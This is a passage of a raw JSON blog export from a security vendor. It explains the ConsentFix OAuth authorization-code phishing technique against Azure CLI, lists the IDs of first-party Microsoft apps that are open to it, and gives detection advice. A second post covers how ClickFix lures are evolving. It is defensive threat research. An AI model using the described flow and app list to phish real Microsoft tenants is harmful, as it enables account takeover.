phishing",[1474],{"type":1337},{},{"nodeType":1293,"value":1477,"marks":1478,"data":1479}," and ",[],{},{"nodeType":1329,"data":1481,"content":1483},{"uri":1482},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[1484],{"nodeType":1293,"value":1485,"marks":1486,"data":1488},"device code phishing",[1487],{"type":1337},{},{"nodeType":1293,"value":1490,"marks":1491,"data":1492}," have been around for some time. However, these mainly focus on connecting your primary workspace account (e.g. Microsoft, Google, etc.) to a fraudulent, attacker-controlled application. But this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":1329,"data":1494,"content":1496},{"uri":1495},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[1497],{"nodeType":1293,"value":1498,"marks":1499,"data":1501},"stricter default configs",[1500],{"type":1337},{},{"nodeType":1293,"value":1503,"marks":1504,"data":1505},". That said, device code phishing still featured prominently in the recent ",[],{},{"nodeType":1329,"data":1507,"content":1509},{"uri":1508},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[1510],{"nodeType":1293,"value":1511,"marks":1512,"data":1514},"high-profile Salesforce attacks in 2025",[1513],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":1517,"data":1518},".",[],{},{"nodeType":1520,"data":1521,"content":1522},"heading-2",{},[1523],{"nodeType":1293,"value":1524,"marks":1525,"data":1527},"What makes ConsentFix so dangerous?",[1526],{"type":1444},{},{"nodeType":1294,"data":1529,"content":1530},{},[1531],{"nodeType":1293,"value":1532,"marks":1533,"data":1534},"Unlike typical OAuth attacks, the novel ConsentFix approach enabled the attacker to target different types of application to what they usually go after — with big implications for detection and response. In this case, the attacker:",[],{},{"nodeType":1536,"data":1537,"content":1538},"unordered-list",{},[1539,1550],{"nodeType":1540,"data":1541,"content":1542},"list-item",{},[1543],{"nodeType":1294,"data":1544,"content":1545},{},[1546],{"nodeType":1293,"value":1547,"marks":1548,"data":1549},"Specifically targeted first-party Microsoft apps that cannot be restricted in the same way as third-party applications, and are pre-consented in every tenant (meaning users can authenticate to them without admin approval). ",[],{},{"nodeType":1540,"data":1551,"content":1552},{},[1553],{"nodeType":1294,"data":1554,"content":1555},{},[1556],{"nodeType":1293,"value":1557,"marks":1558,"data":1559},"Leveraged legacy scopes that are outside the scope of default logging to evade detection, and targeted scopes with known Conditional Access policy exclusions.",[],{},{"nodeType":1294,"data":1561,"content":1562},{},[1563],{"nodeType":1293,"value":1564,"marks":1565,"data":1566},"This means that default controls you’d expect to block malicious OAuth grants don’t apply, you may not have logging enabled to detect it if it did happen to you, and to top it off, conditional access policy exclusions mean that many organizations’ expected controls don’t work as intended in this case. ",[],{},{"nodeType":1433,"data":1568,"content":1569},{},[],{"nodeType":1437,"data":1571,"content":1572},{},[1573],{"nodeType":1293,"value":1574,"marks":1575,"data":1577},"ConsentFix campaign recap",[1576],{"type":1444},{},{"nodeType":1294,"data":1579,"content":1580},{},[1581],{"nodeType":1293,"value":1582,"marks":1583,"data":1584},"Let’s quickly recap how the ConsentFix campaign was implemented. ",[],{},{"nodeType":1294,"data":1586,"content":1587},{},[1588],{"nodeType":1293,"value":1589,"marks":1590,"data":1591},"The victim is served a page which requires that they verify that they are human by pasting a URL into the phishing page.",[],{},{"nodeType":1294,"data":1593,"content":1594},{},[1595],{"nodeType":1293,"value":1596,"marks":1597,"data":1598},"Clicking the “Sign In” button opens a legitimate Microsoft login page. If the user is already logged in (which they likely are if working in their normal browser) their account information is already pre-populated and they won’t need to authenticate again. ",[],{},{"nodeType":1294,"data":1600,"content":1601},{},[1602],{"nodeType":1293,"value":1603,"marks":1604,"data":1605},"Selecting their account redirects them to a localhost URL containing an OAuth authorization code — this is what they then post into the original phishing page to complete the attack. ",[],{},{"nodeType":1294,"data":1607,"content":1608},{},[1609],{"nodeType":1293,"value":1610,"marks":1611,"data":1612},"Once the attacker gets the URL, they can exchange it for an access token or refresh token for the particular application being targeted — in this case, Azure CLI.",[],{},{"nodeType":1294,"data":1614,"content":1615},{},[1616],{"nodeType":1293,"value":1617,"marks":1618,"data":1619},"The TL;DR is that the attacker is manually completing an authorization flow that happens when a user logs into Azure CLI — a a command line client that provides you with the ability to easily manage your Azure AD / Entra ID environment. Except in this case, they’re taking the victim’s information to log in on the attacker’s device instead. ",[],{},{"nodeType":1351,"data":1621,"content":1625},{"target":1622},{"sys":1623},{"id":1624,"type":1356,"linkType":1357},"1eZOs7hXi9FzCE92QEP6xh",[],{"nodeType":1520,"data":1627,"content":1628},{},[1629],{"nodeType":1293,"value":1630,"marks":1631,"data":1633},"Latest campaign details",[1632],{"type":1444},{},{"nodeType":1294,"data":1635,"content":1636},{},[1637],{"nodeType":1293,"value":1638,"marks":1639,"data":1640},"Since we shared our blog post, we’ve had a number of additional details come to light about the campaign, which we’ve continued to track. ",[],{},{"nodeType":1294,"data":1642,"content":1643},{},[1644,1648,1656],{"nodeType":1293,"value":1645,"marks":1646,"data":1647},"It appears to be linked to Russian state-affiliated APT29, as corroborated by threat researchers we’ve been collaborating with. This is consistent with the ",[],{},{"nodeType":1329,"data":1649,"content":1650},{"uri":1331},[1651],{"nodeType":1293,"value":1652,"marks":1653,"data":1655},"stealthy tactics we observed",[1654],{"type":1337},{},{"nodeType":1293,"value":1657,"marks":1658,"data":1659},", which go far beyond the run-of-the-mill detection evasion techniques we see used in criminal phishing campaigns. ",[],{},{"nodeType":1294,"data":1661,"content":1662},{},[1663,1667,1676],{"nodeType":1293,"value":1664,"marks":1665,"data":1666},"It shares many similarities with, and appears to be an evolution of, ",[],{},{"nodeType":1329,"data":1668,"content":1670},{"uri":1669},"https://www.volexity.com/blog/2025/12/04/dangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks/",[1671],{"nodeType":1293,"value":1672,"marks":1673,"data":1675},"this Russia-affiliated campaign identified by Volexity",[1674],{"type":1337},{},{"nodeType":1293,"value":1677,"marks":1678,"data":1679}," that featured a manual version of the attack — where they victim was social engineered via email into opening the Microsoft URL, copying the localhost response, and sending it back to the attacker via email. ",[],{},{"nodeType":1433,"data":1681,"content":1682},{},[],{"nodeType":1437,"data":1684,"content":1685},{},[1686],{"nodeType":1293,"value":1687,"marks":1688,"data":1690},"Top contributions from the community",[1689],{"type":1444},{},{"nodeType":1294,"data":1692,"content":1693},{},[1694],{"nodeType":1293,"value":1695,"marks":1696,"data":1697},"As we mentioned earlier, the community response to ConsentFix has been incredible. ",[],{},{"nodeType":1294,"data":1699,"content":1700},{},[1701],{"nodeType":1293,"value":1702,"marks":1703,"data":1704},"As ever, you get a lot of vendors covering the attack technique with “install our product” as the recommendation. This is to be expected, but it’s misleading when some of these vendors are pushing EDR products that would have absolutely no way of detecting or blocking the attack. ",[],{},{"nodeType":1294,"data":1706,"content":1707},{},[1708],{"nodeType":1293,"value":1709,"marks":1710,"data":1711},"But cutting through the marketing, a lot of really great resources and recommendations were shared. ",[],{},{"nodeType":1520,"data":1713,"content":1714},{},[1715],{"nodeType":1293,"value":1716,"marks":1717,"data":1719},"V2.0 released by John Hammond",[1718],{"type":1444},{},{"nodeType":1294,"data":1721,"content":1722},{},[1723,1727,1735],{"nodeType":1293,"value":1724,"marks":1725,"data":1726},"Within days, John Hammond ",[],{},{"nodeType":1329,"data":1728,"content":1729},{"uri":1368},[1730],{"nodeType":1293,"value":1731,"marks":1732,"data":1734},"posted about ConsentFix on his Youtube channel",[1733],{"type":1337},{},{"nodeType":1293,"value":1736,"marks":1737,"data":1738},", where he showed off a slick improvement on the ConsentFix implementation used by attackers. In his version, the URL containing the Microsoft authorization code was generated in a pop-up browser window that could simply be drag-and-dropped into the phishing page. ",[],{},{"nodeType":1294,"data":1740,"content":1741},{},[1742],{"nodeType":1293,"value":1743,"marks":1744,"data":1745},"This implementation is way smoother, making it much more likely that a victim would fall for it. And this took a matter of days… ",[],{},{"nodeType":1351,"data":1747,"content":1751},{"target":1748},{"sys":1749},{"id":1750,"type":1356,"linkType":1357},"59tfJDRhGThKD48Wjg7uY2",[],{"nodeType":1520,"data":1753,"content":1754},{},[1755],{"nodeType":1293,"value":1756,"marks":1757,"data":1759},"Additional vulnerable first-party apps identified",[1758],{"type":1444},{},{"nodeType":1294,"data":1761,"content":1762},{},[1763,1767,1776],{"nodeType":1293,"value":1764,"marks":1765,"data":1766},"Fabian Bader and Dirk-jan Mollema from Glueck Kanja have ",[],{},{"nodeType":1329,"data":1768,"content":1770},{"uri":1769},"https://entrascopes.com/?bypass=true&authcodeFix=true",[1771],{"nodeType":1293,"value":1772,"marks":1773,"data":1775},"shared a great resource",[1774],{"type":1337},{},{"nodeType":1293,"value":1777,"marks":1778,"data":1779}," on wider first-party apps that are vulnerable to ConsentFix. ",[],{},{"nodeType":1294,"data":1781,"content":1782},{},[1783,1787,1796],{"nodeType":1293,"value":1784,"marks":1785,"data":1786},"In total, there are 11 apps vulnerable to ConsentFix that also have known ",[],{},{"nodeType":1329,"data":1788,"content":1790},{"uri":1789},"https://cloudbrothers.info/conditional-access-bypasses/#documented-bypasses",[1791],{"nodeType":1293,"value":1792,"marks":1793,"data":1795},"Conditional Access exclusions",[1794],{"type":1337},{},{"nodeType":1293,"value":1797,"marks":1798,"data":1799}," (either for the app generally, or when specific scopes are requested for the app):",[],{},{"nodeType":1536,"data":1801,"content":1802},{},[1803,1813,1823,1833,1843,1853,1863,1873,1883,1893,1903],{"nodeType":1540,"data":1804,"content":1805},{},[1806],{"nodeType":1294,"data":1807,"content":1808},{},[1809],{"nodeType":1293,"value":1810,"marks":1811,"data":1812},"Microsoft Azure CLI: 04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":1540,"data":1814,"content":1815},{},[1816],{"nodeType":1294,"data":1817,"content":1818},{},[1819],{"nodeType":1293,"value":1820,"marks":1821,"data":1822},"Microsoft Azure PowerShell: 1950a258-227b-4e31-a9cf-717495945fc2",[],{},{"nodeType":1540,"data":1824,"content":1825},{},[1826],{"nodeType":1294,"data":1827,"content":1828},{},[1829],{"nodeType":1293,"value":1830,"marks":1831,"data":1832},"Microsoft Teams: 1fec8e78-bce4-4aaf-ab1b-5451cc387264",[],{},{"nodeType":1540,"data":1834,"content":1835},{},[1836],{"nodeType":1294,"data":1837,"content":1838},{},[1839],{"nodeType":1293,"value":1840,"marks":1841,"data":1842},"Microsoft Whiteboard Client: 57336123-6e14-4acc-8dcf-287b6088aa28",[],{},{"nodeType":1540,"data":1844,"content":1845},{},[1846],{"nodeType":1294,"data":1847,"content":1848},{},[1849],{"nodeType":1293,"value":1850,"marks":1851,"data":1852},"Microsoft Flow Mobile PROD-GCCH-CN: 57fcbcfa-7cee-4eb1-8b25-12d2030b4ee0",[],{},{"nodeType":1540,"data":1854,"content":1855},{},[1856],{"nodeType":1294,"data":1857,"content":1858},{},[1859],{"nodeType":1293,"value":1860,"marks":1861,"data":1862},"Enterprise Roaming and Backup: 60c8bde5-3167-4f92-8fdb-059f6176dc0",[],{},{"nodeType":1540,"data":1864,"content":1865},{},[1866],{"nodeType":1294,"data":1867,"content":1868},{},[1869],{"nodeType":1293,"value":1870,"marks":1871,"data":1872},"Visual Studio: 872cd9fa-d31f-45e0-9eab-6e460a02d1f1",[],{},{"nodeType":1540,"data":1874,"content":1875},{},[1876],{"nodeType":1294,"data":1877,"content":1878},{},[1879],{"nodeType":1293,"value":1880,"marks":1881,"data":1882},"Aadrm Admin Powershell: 90f610bf-206d-4950-b61d-37fa6fd1b224",[],{},{"nodeType":1540,"data":1884,"content":1885},{},[1886],{"nodeType":1294,"data":1887,"content":1888},{},[1889],{"nodeType":1293,"value":1890,"marks":1891,"data":1892},"Microsoft SharePoint Online Management Shell: 9bc3ab49-b65d-410a-85ad-de819febfddc",[],{},{"nodeType":1540,"data":1894,"content":1895},{},[1896],{"nodeType":1294,"data":1897,"content":1898},{},[1899],{"nodeType":1293,"value":1900,"marks":1901,"data":1902},"Microsoft Power Query for Excel: a672d62c-fc7b-4e81-a576-e60dc46e951d",[],{},{"nodeType":1540,"data":1904,"content":1905},{},[1906],{"nodeType":1294,"data":1907,"content":1908},{},[1909],{"nodeType":1293,"value":1910,"marks":1911,"data":1912},"Visual Studio Code: aebc6443-996d-45c2-90f0-388ff96faa56",[],{},{"nodeType":1433,"data":1914,"content":1915},{},[],{"nodeType":1437,"data":1917,"content":1918},{},[1919],{"nodeType":1293,"value":1920,"marks":1921,"data":1923},"Predictions for ConsentFix",[1922],{"type":1444},{},{"nodeType":1294,"data":1925,"content":1926},{},[1927],{"nodeType":1293,"value":1928,"marks":1929,"data":1930},"Based on the speed at which new iterations on the ConsentFix technique were shared by security researchers, and the breadth of apps and possible scopes that can be leveraged, both red teams and criminals will inevitably adopt ConsentFix into their arsenal of TTPs in the near future. It is likely that new ConsentFix variants will emerge imminently (if not already in circulation). ",[],{},{"nodeType":1294,"data":1932,"content":1933},{},[1934],{"nodeType":1293,"value":1935,"marks":1936,"data":1937},"All security teams responsible for protecting Microsoft environments should ensure that monitoring controls and mitigations are put in place as a matter of high priority. ",[],{},{"nodeType":1433,"data":1939,"content":1940},{},[],{"nodeType":1437,"data":1942,"content":1943},{},[1944],{"nodeType":1293,"value":1945,"marks":1946,"data":1948},"Updated recommendations for security teams",[1947],{"type":1444},{},{"nodeType":1294,"data":1950,"content":1951},{},[1952],{"nodeType":1293,"value":1953,"marks":1954,"data":1955},"As an entirely browser-native attack technique, many traditional security tools and data sources are of limited use when it comes to detecting or pre-emptively blocking this attack. At the same time, the attack exploits default Microsoft security configs to evade both prevention and detection controls.",[],{},{"nodeType":1294,"data":1957,"content":1958},{},[1959],{"nodeType":1293,"value":1960,"marks":1961,"data":1962},"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. ",[],{},{"nodeType":1294,"data":1964,"content":1965},{},[1966],{"nodeType":1293,"value":1967,"marks":1968,"data":1969},"For organizations relying on Microsoft logging as the sole line of defense against this attack, there are some new recommendations to add to the list thanks to the community response: ",[],{},{"nodeType":1536,"data":1971,"content":1972},{},[1973,1996,2006,2027],{"nodeType":1540,"data":1974,"content":1975},{},[1976],{"nodeType":1294,"data":1977,"content":1978},{},[1979,1983,1992],{"nodeType":1293,"value":1980,"marks":1981,"data":1982},"Ensure that logging for the deprecated ",[],{},{"nodeType":1329,"data":1984,"content":1986},{"uri":1985},"https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/aadgraphactivitylogs",[1987],{"nodeType":1293,"value":1988,"marks":1989,"data":1991},"AADGraphActivityLogs",[1990],{"type":1337},{},{"nodeType":1293,"value":1993,"marks":1994,"data":1995}," is enabled.",[],{},{"nodeType":1540,"data":1997,"content":1998},{},[1999],{"nodeType":1294,"data":2000,"content":2001},{},[2002],{"nodeType":1293,"value":2003,"marks":2004,"data":2005},"Hunt in logs for the Application IDs highlighted above, along with the Resource IDs for Windows Azure Active Directory (00000002-0000-0000-c000-000000000000) and Microsoft Intune Checkin (26a4ae64-5862-427f-a9b0-044e62572a4f)",[],{},{"nodeType":1540,"data":2007,"content":2008},{},[2009],{"nodeType":1294,"data":2010,"content":2011},{},[2012,2015,2023],{"nodeType":1293,"value":37,"marks":2013,"data":2014},[],{},{"nodeType":1329,"data":2016,"content":2017},{"uri":1407},[2018],{"nodeType":1293,"value":2019,"marks":2020,"data":2022},"Create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them",[2021],{"type":1337},{},{"nodeType":1293,"value":2024,"marks":2025,"data":2026}," to reduce the attack surface of users that can be phished with this method.",[],{},{"nodeType":1540,"data":2028,"content":2029},{},[2030],{"nodeType":1294,"data":2031,"content":2032},{},[2033],{"nodeType":1293,"value":2034,"marks":2035,"data":2036},"Block access to CLI tools via Conditional Access policy and issue exclusions for authorized users/groups. ",[],{},{"nodeType":1294,"data":2038,"content":2039},{},[2040,2044,2053,2057,2064],{"nodeType":1293,"value":2041,"marks":2042,"data":2043},"Additional resources that may be of use include community-created ",[],{},{"nodeType":1329,"data":2045,"content":2047},{"uri":2046},"https://github.com/elastic/detection-rules/pull/5485",[2048],{"nodeType":1293,"value":2049,"marks":2050,"data":2052},"Elastic detection rules",[2051],{"type":1337},{},{"nodeType":1293,"value":2054,"marks":2055,"data":2056}," for ConsentFix and further mitigation and hunting guidance from ",[],{},{"nodeType":1329,"data":2058,"content":2059},{"uri":1394},[2060],{"nodeType":1293,"value":1397,"marks":2061,"data":2063},[2062],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":2066,"data":2067},". ",[],{},{"nodeType":1433,"data":2069,"content":2070},{},[],{"nodeType":1437,"data":2072,"content":2073},{},[2074],{"nodeType":1293,"value":2075,"marks":2076,"data":2078},"Learn more about Push Security",[2077],{"type":1444},{},{"nodeType":1294,"data":2080,"content":2081},{},[2082],{"nodeType":1293,"value":2083,"marks":2084,"data":2085},"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",[],{},{"nodeType":1294,"data":2087,"content":2088},{},[2089],{"nodeType":1293,"value":2090,"marks":2091,"data":2092},"Push tackles browser-based attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. This means analyzing the end-to-end process of a webpage loading/running in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",[],{},{"nodeType":1294,"data":2094,"content":2095},{},[2096],{"nodeType":1293,"value":2097,"marks":2098,"data":2099},"This is the only reliable way to detect malicious websites in a world where IoC-based detections are trivial for attackers to get around. Rather than playing known-bad whac-a-mole, Push detects and blocks even zero-day browser threats in real time.",[],{},{"nodeType":1294,"data":2101,"content":2102},{},[2103],{"nodeType":1293,"value":2104,"marks":2105,"data":2106},"Push stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1294,"data":2108,"content":2109},{},[2110,2114,2123,2127,2136],{"nodeType":1293,"value":2111,"marks":2112,"data":2113},"To learn more about Push, ",[],{},{"nodeType":1329,"data":2115,"content":2117},{"uri":2116},"https://pushsecurity.com/resources/product-brochure",[2118],{"nodeType":1293,"value":2119,"marks":2120,"data":2122},"check out our latest product overview",[2121],{"type":1337},{},{"nodeType":1293,"value":2124,"marks":2125,"data":2126}," or ",[],{},{"nodeType":1329,"data":2128,"content":2130},{"uri":2129},"https://pushsecurity.com/demo",[2131],{"nodeType":1293,"value":2132,"marks":2133,"data":2135},"book some time with one of our team for a live demo",[2134],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":2137,"data":2138},[],{},{"nodeType":1351,"data":2140,"content":2144},{"target":2141},{"sys":2142},{"id":2143,"type":1356,"linkType":1357},"4D7zpYAc1tTEAmn2hpkWPe",[],{"nodeType":1294,"data":2146,"content":2147},{},[2148],{"nodeType":1293,"value":37,"marks":2149,"data":2150},[],{},"ConsentFix debrief: latest community insights, recommendations, and predictions","New insights on the ConsentFix campaign stopped by Push.","2026-01-14T00:00:00.000Z","consentfix-debrief",{"items":2156},[2157,2159],{"sys":2158,"name":1310},{"id":1309},{"sys":2160,"name":1306},{"id":1305},{"items":2162},[2163],{"fullName":2164,"firstName":2165,"jobTitle":2166,"profilePicture":2167},"Dan Green","Dan","Threat Research",{"url":2168},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1314,"sys":2170,"content":2172,"title":2751,"synopsis":2752,"hashTags":118,"publishedDate":2753,"slug":2754,"tagsCollection":2755,"authorsCollection":2761},{"id":2171},"7rVNBW6rYXnXMpI0JEwzgR",{"json":2173},{"nodeType":1295,"data":2174,"content":2175},{},[2176,2183,2190,2202,2208,2215,2218,2226,2233,2239,2255,2262,2285,2292,2298,2301,2309,2342,2348,2367,2373,2393,2400,2406,2409,2417,2424,2444,2451,2471,2478,2484,2487,2495,2502,2535,2542,2549,2595,2614,2625,2632,2635,2643,2663,2670,2677,2683,2686,2694,2714,2740,2745],{"nodeType":1294,"data":2177,"content":2178},{},[2179],{"nodeType":1293,"value":2180,"marks":2181,"data":2182},"ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device.",[],{},{"nodeType":1294,"data":2184,"content":2185},{},[2186],{"nodeType":1293,"value":2187,"marks":2188,"data":2189},"As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution.",[],{},{"nodeType":1294,"data":2191,"content":2192},{},[2193,2197],{"nodeType":1293,"value":2194,"marks":2195,"data":2196},"One particular example stood out to us in our research. ",[],{},{"nodeType":1293,"value":2198,"marks":2199,"data":2201},"So, is this the most advanced ClickFix you’ve seen?",[2200],{"type":1444},{},{"nodeType":1351,"data":2203,"content":2207},{"target":2204},{"sys":2205},{"id":2206,"type":1356,"linkType":1357},"ID7VKJNOZk729P5zBOBjZ",[],{"nodeType":1294,"data":2209,"content":2210},{},[2211],{"nodeType":1293,"value":2212,"marks":2213,"data":2214},"Let’s break it down further.",[],{},{"nodeType":1433,"data":2216,"content":2217},{},[],{"nodeType":1437,"data":2219,"content":2220},{},[2221],{"nodeType":1293,"value":2222,"marks":2223,"data":2225},"How ClickFix pages are evolving",[2224],{"type":1444},{},{"nodeType":1294,"data":2227,"content":2228},{},[2229],{"nodeType":1293,"value":2230,"marks":2231,"data":2232},"The CloudFlare-based lure is a great example of how ClickFix pages themselves are evolving — and becoming increasingly convincing to users. ",[],{},{"nodeType":1351,"data":2234,"content":2238},{"target":2235},{"sys":2236},{"id":2237,"type":1356,"linkType":1357},"4wJOgtofImjbsekyXMc5Ec",[],{"nodeType":1294,"data":2240,"content":2241},{},[2242,2246,2251],{"nodeType":1293,"value":2243,"marks":2244,"data":2245},"This is an incredibly slick example — ",[],{},{"nodeType":1293,"value":2247,"marks":2248,"data":2250},"it almost looks like Cloudflare shipped a new kind of bot check service. ",[2249],{"type":1444},{},{"nodeType":1293,"value":2252,"marks":2253,"data":2254},"The embedded video, countdown timer, and counter for “users verified in the last hour” all serve to increase the sense of authenticity, and put extra pressure on the victim to complete the check. ",[],{},{"nodeType":1294,"data":2256,"content":2257},{},[2258],{"nodeType":1293,"value":2259,"marks":2260,"data":2261},"There are a couple of extra things happening under the hood here, too:",[],{},{"nodeType":1536,"data":2263,"content":2264},{},[2265,2275],{"nodeType":1540,"data":2266,"content":2267},{},[2268],{"nodeType":1294,"data":2269,"content":2270},{},[2271],{"nodeType":1293,"value":2272,"marks":2273,"data":2274},"The page is adapting to the device that you’re visiting from, serving up instructions specific to the user’s Mac (increasingly common as ClickFix expands to support different Operating Systems).",[],{},{"nodeType":1540,"data":2276,"content":2277},{},[2278],{"nodeType":1294,"data":2279,"content":2280},{},[2281],{"nodeType":1293,"value":2282,"marks":2283,"data":2284},"The page is automatically copying the malicious code to the user’s clipboard via JavaScript (which we see in 9/10 cases).",[],{},{"nodeType":1294,"data":2286,"content":2287},{},[2288],{"nodeType":1293,"value":2289,"marks":2290,"data":2291},"For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command — so it’s no surprise that this kind of highly convincing page is so effective at duping victims into following the instructions. ",[],{},{"nodeType":1351,"data":2293,"content":2297},{"target":2294},{"sys":2295},{"id":2296,"type":1356,"linkType":1357},"LiVIyGxdAaUXUfvKjD6ON",[],{"nodeType":1433,"data":2299,"content":2300},{},[],{"nodeType":1437,"data":2302,"content":2303},{},[2304],{"nodeType":1293,"value":2305,"marks":2306,"data":2308},"How ClickFix delivery methods are evolving",[2307],{"type":1444},{},{"nodeType":1294,"data":2310,"content":2311},{},[2312,2316,2325,2329,2338],{"nodeType":1293,"value":2313,"marks":2314,"data":2315},"There’s also the fact that this page wasn’t accessed via email. The top delivery vector for ClickFix attacks that we’ve observed is, in fact, Google Search — in the form of ",[],{},{"nodeType":1329,"data":2317,"content":2319},{"uri":2318},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[2320],{"nodeType":1293,"value":2321,"marks":2322,"data":2324},"poisoned search results and malicious advertising (malvertising)",[2323],{"type":1337},{},{"nodeType":1293,"value":2326,"marks":2327,"data":2328},". Attackers are either taking over legitimate sites (there’s a ",[],{},{"nodeType":1329,"data":2330,"content":2332},{"uri":2331},"https://www.bleepingcomputer.com/news/security/hackers-launch-mass-attacks-exploiting-outdated-wordpress-plugins/",[2333],{"nodeType":1293,"value":2334,"marks":2335,"data":2337},"steady supply of website hosting and CMS vulnerabilities",[2336],{"type":1337},{},{"nodeType":1293,"value":2339,"marks":2340,"data":2341}," to take advantage of) or simply vibe-coding their own sites and optimizing them for various search terms. ",[],{},{"nodeType":1351,"data":2343,"content":2347},{"target":2344},{"sys":2345},{"id":2346,"type":1356,"linkType":1357},"6N9EmH6AaN6Hr4xk6ozATR",[],{"nodeType":1294,"data":2349,"content":2350},{},[2351,2355,2364],{"nodeType":1293,"value":2352,"marks":2353,"data":2354},"And because most anti-phishing controls are implemented via email, by using ",[],{},{"nodeType":1329,"data":2356,"content":2358},{"uri":2357},"https://pushsecurity.com/blog/why-attackers-are-moving-beyond-email-based-phishing?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2359],{"nodeType":1293,"value":2360,"marks":2361,"data":2363},"non-email delivery vectors, an entire layer of detection opportunity is cut out",[2362],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":2365,"data":2366},[],{},{"nodeType":1351,"data":2368,"content":2372},{"target":2369},{"sys":2370},{"id":2371,"type":1356,"linkType":1357},"1CWsZlLFX9TS53J1uamOG8",[],{"nodeType":1294,"data":2374,"content":2375},{},[2376,2380,2389],{"nodeType":1293,"value":2377,"marks":2378,"data":2379},"But even when they are sent via email, ClickFix pages, like other modern phishing sites, are using a range of ",[],{},{"nodeType":1329,"data":2381,"content":2383},{"uri":2382},"https://pushsecurity.com/blog/phishing-detection-evasion-launch?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[2384],{"nodeType":1293,"value":2385,"marks":2386,"data":2388},"detection evasion techniques",[2387],{"type":1337},{},{"nodeType":1293,"value":2390,"marks":2391,"data":2392}," that prevent them being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e. blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures firing. ",[],{},{"nodeType":1294,"data":2394,"content":2395},{},[2396],{"nodeType":1293,"value":2397,"marks":2398,"data":2399},"Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.",[],{},{"nodeType":1351,"data":2401,"content":2405},{"target":2402},{"sys":2403},{"id":2404,"type":1356,"linkType":1357},"3HiqpIBWWMr5FMi3IBzXcc",[],{"nodeType":1433,"data":2407,"content":2408},{},[],{"nodeType":1437,"data":2410,"content":2411},{},[2412],{"nodeType":1293,"value":2413,"marks":2414,"data":2416},"How ClickFix payloads are evolving",[2415],{"type":1444},{},{"nodeType":1294,"data":2418,"content":2419},{},[2420],{"nodeType":1293,"value":2421,"marks":2422,"data":2423},"It’s not just the ClickFix page and delivery mechanisms that are evolving — the services where code is being run, and the type of payload, are also increasingly varied. ",[],{},{"nodeType":1294,"data":2425,"content":2426},{},[2427,2431,2440],{"nodeType":1293,"value":2428,"marks":2429,"data":2430},"While the main payloads observed by Push are mshta and PowerShell, ",[],{},{"nodeType":1329,"data":2432,"content":2434},{"uri":2433},"https://mhaggis.github.io/ClickGrab/techniques.html",[2435],{"nodeType":1293,"value":2436,"marks":2437,"data":2439},"attackers are abusing a wide range of LOLBINS",[2438],{"type":1337},{},{"nodeType":1293,"value":2441,"marks":2442,"data":2443}," targeting different services across Operating Systems.",[],{},{"nodeType":1294,"data":2445,"content":2446},{},[2447],{"nodeType":1293,"value":2448,"marks":2449,"data":2450},"While it is possible to disable the Win+R dialog box and limit the applications that can be run from the File Explorer address bar, it is not possible to similarly restrict users from interacting with other legitimate services to run malicious commands. ",[],{},{"nodeType":1294,"data":2452,"content":2453},{},[2454,2458,2467],{"nodeType":1293,"value":2455,"marks":2456,"data":2457},"Another recent example termed ",[],{},{"nodeType":1329,"data":2459,"content":2461},{"uri":2460},"https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/",[2462],{"nodeType":1293,"value":2463,"marks":2464,"data":2466},"cache smuggling",[2465],{"type":1337},{},{"nodeType":1293,"value":2468,"marks":2469,"data":2470}," was also identified by security researchers. This technique combines a ClickFix approach with JavaScript that caches a malicious file posing as a JPG. This means that the ClickFix command executes locally — effectively getting an entire zip file onto the local system without the PowerShell command needing to make any web requests.",[],{},{"nodeType":1294,"data":2472,"content":2473},{},[2474],{"nodeType":1293,"value":2475,"marks":2476,"data":2477},"Finally, it’s worth considering the future of ClickFix. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? 